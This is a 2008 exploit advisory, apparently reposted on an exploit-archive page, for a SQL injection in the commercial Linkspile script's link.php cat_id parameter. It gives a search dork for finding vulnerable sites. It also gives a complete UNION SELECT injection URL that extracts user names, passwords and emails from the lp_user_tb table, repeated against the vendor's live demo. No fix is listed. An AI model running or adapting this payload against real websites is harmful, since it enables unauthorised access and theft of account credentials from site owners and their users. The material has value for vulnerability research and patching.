Linkspile (link.php cat_id) Remote SQL Injection Vulnerability

2008-05-13 00:00:00

##########################################################
# Remote SQL Injection Vulnerabilities #
# Linkspile [ link.php ] #
##########################################################


## Author : HaCkeR_EgY

## C0NTACT : [email protected]

## H^OME : www.PAL-HaCkeR.com & ATSDP.COM

## Script Name : Linkspile

## Download : http://www.linkspile.com

## Price : $399.00 =======> Buy iT : http://www.cmsnx.com/psf/order.php?id=10
###########################################################################
###########################################################################

## D0rk : Powered By linkspile


## ExPlo!T :

=====>> http://www.example.com/link.php?cat_id=-1/**/union/**/select/**/1,2,3,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,18/**/from/**/lp_user_tb/*


## L!ve Dem0 (Demo has changed the links.php filename):


======>>http://www.linkspile.com/linking.page.php?cat_id=-1/**/union/**/select/**/1,2,3,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,18/**/from/**/lp_user_tb/*





################################################################################

[<>] Thanx : MY Brotha and MY Master " Abo Mohamed "

[<>] Greetz : Mr.SQL , Mohamed el Arab ,F!resell, DaRk MaStEr , H-T Team , Stack-Terrorist

#################################################################################

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.